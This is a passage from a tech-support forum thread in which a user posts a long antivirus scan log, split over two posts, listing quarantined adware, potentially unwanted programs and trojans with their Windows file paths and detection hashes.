    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\56NU2ZCLA3\advance.exe, Quarantined, [2f7076fde6b42c0ab9e221cf1be914ec],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\56NU2ZCLA3\win.exe, Quarantined, [603f81f2e0bae254bdc6b19037c96f91],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Local\Temp\E5BQYK8JI\YY5R6MA4B.exe, Quarantined, [b6e9185b5644a19543500ddb2dd738c8],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\FTTHLD4GQ\FTTHLD4GQ.exe, Quarantined, [e3bc79faaaf0d3632378b838f014f40c],
    Trojan.KorAd, C:\Users\Administrator\AppData\Local\Temp\18003\KuaiZip_Setup_long_1.exe, Quarantined, [633cf0835e3c66d0bae9b4297c88936d],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\Temp\2NPO81QYC\2NPO81QYC.exe, Quarantined, [049ba3d00397ff372f6c02ee55af3ec2],
    Trojan.Addrop, C:\Windows\Temp\bobca\Deysj.exe, Quarantined, [3a65e2915545d462c10636aaa45dbb45],
    Adware.PennyBee.WnskRST, C:\Windows\Temp\bobca\Guxlew.din, Quarantined, [158ad49f2872b086bf242b87fb066799],
    PUP.Optional.InstallCore, C:\Users\Administrator\Downloads\Firefox_Setup(1).exe, Quarantined, [e1be185b9ffb6acc2249bd7e03fe49b7],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431\qnswAE98.tmp, Quarantined, [2d72096aa4f6ce68bb95b1d7f90805fb],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474227849-5810-8038-B3C04F425431\qnsbFA67.tmp, Quarantined, [78272053a7f342f4aba596f215ece31d],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\bvyvcvd.exe, Quarantined, [3f605a19edad9f976268e4d37f82a759],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\pbqrmvbub, Quarantined, [1c83571c643694a2f8cea512f40d7987],
    PUP.Optional.TempLaunch, C:\Windows\System32\Tasks\Pritc, Quarantined, [2b74db982179af873c09834822e004fc],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474185518-5810-8038-B3C04F425431\Uninstall.exe, Quarantined, [1e8162110f8b6bcb2aa53f5de61da759],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474195550-5810-8038-B3C04F425431\Uninstall.exe, Quarantined, [7d22c5aed7c3f83e04cb673534cf8779],
    PUP.Optional.ConvertAd, C:\Users\Administrator\AppData\Local\4C4C4544-1474227849-5810-8038-B3C04F425431\Uninstall.exe, Quarantined, [4b54a2d1afebb58128a7a6f692718080],
    PUP.Optional.PCSpeedUp, C:\Windows\Tasks\PC SpeedUp Service Deactivator.job, Quarantined, [d2cda1d2e0bab97d3ade8c23847f4db3],
    PUP.Optional.SearchModule, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\searchplugins\smod.xml, Quarantined, [0c93b3c074262e081a59d2e1907344bc],
    PUP.Optional.SearchModule, C:\Windows\Temp\SM_cache_firefox.exe.cache, Quarantined, [9c03d89bf4a69f979ed87142f50e44bc],
    PUP.Optional.SearchModule, C:\Windows\Temp\SM_cache_iexplore.exe.cache, Quarantined, [257a3241782249edb1c5912231d2da26],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\1.tmp.exe, Quarantined, [405fd79cd4c61f1700abe8d7e51e2ad6],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\2.tmp.exe, Quarantined, [4b54452e2872270fa8037a45cd36c23e],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\3.tmp.exe, Quarantined, [a7f8c0b31b7f2412d3d8ad12b350bf41],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\4.tmp.exe, Quarantined, [4857136045559c9ad6d5e3dcb84bd32d],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\5.tmp.exe, Quarantined, [aef13a390694e74ff4b711ae91729868],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\6.tmp.exe, Quarantined, [d1ce066d4555a49232794b741ce731cf],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\7.tmp.exe, Quarantined, [f4abcea5a3f774c2f4b7dee1af54f808],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\8.tmp.exe, Quarantined, [adf28fe4e3b7c1752d7eab14e32001ff],
    Trojan.Agent.E, C:\Users\Administrator\AppData\Local\Temp\9.tmp.exe, Quarantined, [2e71195ab8e2d2646249ac133ec59c64],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\localStorageIE.txt, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0085B0B0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0015BB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\00194A70, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\001AB580, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\001CBA50, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0020B488, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\002BAE98, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\003582F0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\00364910, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0036B0B0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0036B638, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0036B7F0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0036BB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0036C538, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\003CAE50, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\003D3868, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0051BB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0052B7F0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0052C648, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\007CB0B0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\007DAE98, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\007E5570, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\007F5308, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0080BCC0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0080C550, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0081E150, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\00844910, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0084BB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0085BB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0089C400, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\008CB650, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\008CD340, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\008DE428, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\008EBB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\008FB7F0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0090BB10, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\00922FA0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\0093B0B0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\00967F58, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\009BB0B0, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\009F4A70, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\00A2C400, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\02190648, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\02261E48, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\022D1E48, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\02331E48, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\Company\Product\1.0\localStorageIE_backup.txt, Quarantined, [316e87ec07937db951f1a420ad56956b],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\System Healer Task, Quarantined, [5748f1829efceb4bbceebb1ff90a40c0],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\System HealerPeriod, Quarantined, [1788155e940642f44862b32759aac33d],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\System HealerStartUp, Quarantined, [ccd3680b31693bfb8d1d7f5bb64d639d],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\SystemHealer Monitor, Quarantined, [dac5462d8317181e9e0d954540c3f60a],
    PUP.Optional.SystemHealer, C:\Windows\System32\Tasks\SystemHealer Run Delay, Quarantined, [4e51393a683202345c4ff9e1b94a867a],
    PUP.Optional.SystemHealer, C:\Windows\Tasks\System HealerPeriod.job, Quarantined, [4a559ad905957cba48640dcd20e36898],
    PUP.Optional.SystemHealer, C:\Windows\Tasks\System HealerStartUp.job, Quarantined, [227d056e8119dc5aaa024496020140c0],
    PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, Quarantined, [128de2915d3d8fa7c037bf1e48bb7f81],
    PUP.Optional.SearchProtect.AppFlsh, C:\Windows\AppPatch\Custom\Custom64\{cf2797aa-b7ec-e311-8ed9-005056c00008}.sdb, Quarantined, [d5ca650e7c1e5ed8f9ffdc016f949967],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\1f0ab4e9-4821-0\BIT3192.tmp, Quarantined, [4e51264dbddd66d04875ea0456adb54b],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\1f0ab4e9-7297-1\BIT2A9E.tmp, Quarantined, [f9a6343f46542a0c902d4da12fd45fa1],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\4f8a1888-4c51-1\BIT4477.tmp, Quarantined, [b0ef274ce4b67db9f4c9b7370ff4966a],
    PUP.Optional.Amonetize.Gen, C:\ProgramData\4f8a1888-71e5-0\BIT484E.tmp, Quarantined, [7c236c07d8c256e0ac1140ae38cb14ec],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\ApplicationHosting.dat, Quarantined, [f4ab98dbfe9cca6c9ac2e40b48bb4db3],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\md.xml, Quarantined, [4b54541f12880a2c69f414dba45f2bd5],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\noah.dat, Quarantined, [5a4551229ffb73c39ec0856a659e06fa],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\uninstall_temp.ico, Quarantined, [1f807ef5faa00e2887d84ca3bc473bc5],
    PUP.Optional.Linkury, C:\Users\Administrator\AppData\Roaming\lobby.dat, Quarantined, [a7f8b7bcacee2b0b9e4a945bc1420cf4],
    PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\RankDex.ico, Quarantined, [1d82492acfcb57dffe1e9d57927112ee],
    PUP.Optional.Linkury, C:\Windows\Temp\Smartbar\Zimlam.ico, Quarantined, [1d82492acfcb57dffe1e9d57927112ee],
    PUP.Optional.Linkury.ACMB1, C:\Windows\SysWOW64\findit.xml, Quarantined, [653a3e35eab073c383615c98f40f06fa],
    PUP.Optional.Goobzo, C:\Windows\System32\Tasks\SMW_P, Quarantined, [bee1f083eeac95a1695266915ca724dc],
    PUP.Optional.ProntSpooler, C:\Users\Administrator\AppData\Local\Apps\2.0\abril.InstallState, Quarantined, [f8a78ee58218cf6762029662fa0932ce],
    PUP.Optional.ProntSpooler, C:\Users\Administrator\AppData\Local\Apps\2.0\abril.stt, Quarantined, [0b944f246f2bdf57ee7694649d662cd4],
    PUP.Optional.SearchProtect.Gen, C:\Windows\System32\Tasks\bvyvcvd, Quarantined, [544b97dc4258092d92389762f3106f91],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Freshdinfind.tst, Quarantined, [39667201b8e28caaaf617c810cf7ee12],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Koncom.tst, Quarantined, [e1bec1b24a5046f015fb916c18eb7d83],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Labin.tst, Quarantined, [712e63103169dc5a927eb24b8b78cf31],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Tipair.tst, Quarantined, [faa5e88b6f2b54e2c54b1de06b989967],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\Triodom.tst, Quarantined, [e6b95d16f6a476c06ba56895778ce51b],
    PUP.Optional.Linkury.Gen, C:\Users\Administrator\AppData\Roaming\VillaStattom.tst, Quarantined, [d9c6db983d5dbf7751bf728bb44fe020],
    PUP.Optional.TTWifi, C:\Windows\System32\Tasks\ttwifi, Quarantined, [7c23f47f7921360089eda45913f009f7],
    PUP.Optional.QuickCleaner, C:\Windows\System32\Tasks\e02c4bd5-54d5-4470-9ea0-a68d88112c00, Quarantined, [9d02f380f0aaf93d8ebf8975d72c05fb],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Web Data, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\cookies, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\cookies-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Web Data-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\008bfd9a2b1fc26e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\00aa6e5584a3c7dd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],

    Part 2 on next post
     
  9. photiost

    photiost Established Techie7 Member

    Here is the continuation:

    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\01cb4730fc2328cf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\021ece26ff440ba5_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\026bf6b21122d668_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\028ae572e13ba94a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\02c885bc2cdcf359_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\02e146be68dbcc47_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\0394be1dfc00f6cd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\043f5a62cdcf68f7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\73a758113870bb44_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\74277a4e76a0f9f7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\742b4b230b0de717_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\7476f163f30259ab_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\748110e5d0b8befb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\74e1d18089671bcc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\754015db266cd579_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\769d76d0e428d70d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\772695100dd4856a_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\77b49e39f9b11dca_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d99c5fed1a2d2a94_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\d9f8f865cb4149dd_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\dab5554422002606_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\dab89f6ec1326fc3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\dacd5e1906b2ec2f_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\dbc1f74757c23854_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\dd2019450ab99abb_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\dd833aac7029d34b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\ddffe424b205b837_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\de9767056a1eef49_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e0682dc828b6e442_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e1688970584a9571_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\e1a86ef2ca2f7faf_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\910651a2c8207572_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\9135623337c19ed2_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\91adb36a511549d7_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\922d4c96d234d1af_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\936e846305e5b0c3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\93c8d916c59f779d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\942ff233141c0901_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\947160e3032f8cb9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\9574064be86fa7ab_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\442fb3521ed5b8d9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\44c048231d2be5f1_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\45674822b967f99d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\45893e49af7f462b_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\45af7f611687ccc0_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\46382b8746bff275_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\464de692b3c276ce_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\47cff2ba15008159_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\48106488d778b4a9_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\488240439ab474ae_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\48a000e3847c68c5_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4927254b91b7863d_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4a93292a8e652772_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4af48ec07da90f03_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4c073e8935f3d797_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4ed55d3869486e00_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4f689d144c4b4dcc_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\4f71b1f9ba41bac4_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f7730f3c5717467e_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f77b439c52885bf3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f7f33abe1a897466_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f8a4aa340149fad3_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\f8f3e46c9a80fc59_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\fa7e39d11ed8a831_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Cache\fb08745bd238cf54_0, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
